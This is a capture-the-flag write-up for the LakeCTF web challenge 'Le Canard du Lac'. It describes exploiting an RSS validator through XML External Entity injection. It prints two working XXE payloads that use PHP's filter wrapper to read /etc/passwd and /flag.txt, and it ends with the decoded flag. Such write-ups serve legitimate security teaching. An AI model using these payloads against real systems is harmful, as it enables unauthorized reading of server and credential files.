Le Canard du Lac

LakeCTF '25-'26 QualsWebWriteup by @xabito

Le Canard du Lac is a news website run by a collective of hackers from Lake Leman (or Geneva). No brute-forcing is required.

Connections

  • https://chall.polygl0ts.ch:8085

Recon

While exploring the website, we notice an RSS Validator tool that lets us submit XML files to be parsed on the server. This feature looks like it could be vulnerable to XML External Entity (XXE) injection attacks.

XML Validator

Exploitation

To test this, we can create an XXE payload that uses PHP’s filter wrapper to read the contents of a file on the server:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
]>
<rss version="2.0">
    <channel>
        <title>&xxe;</title>
        <description>Testing XXE</description>
        <link>http://example.com</link>
    </channel>
</rss>

XXE Check

Flag capture

We simply try typical file paths for the flag until we find the correct one and successfully extract the flag.

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE foo [
<!ENTITY xxe SYSTEM "php://filter/convert.base64-encode/resource=/flag.txt">
]>
<rss version="2.0">
    <channel>
        <title>&xxe;</title>
        <description>Testing XXE</description>
        <link>http://example.com</link>
    </channel>
</rss>

Flag capture

$ echo 'RVBGTHtsNGszX0xFTUFOX215c3RlcjFlc19AX2VwZmwhfQ==' | base64 -d
EPFL{l4k3_LEMAN_myster1es_@_epfl!}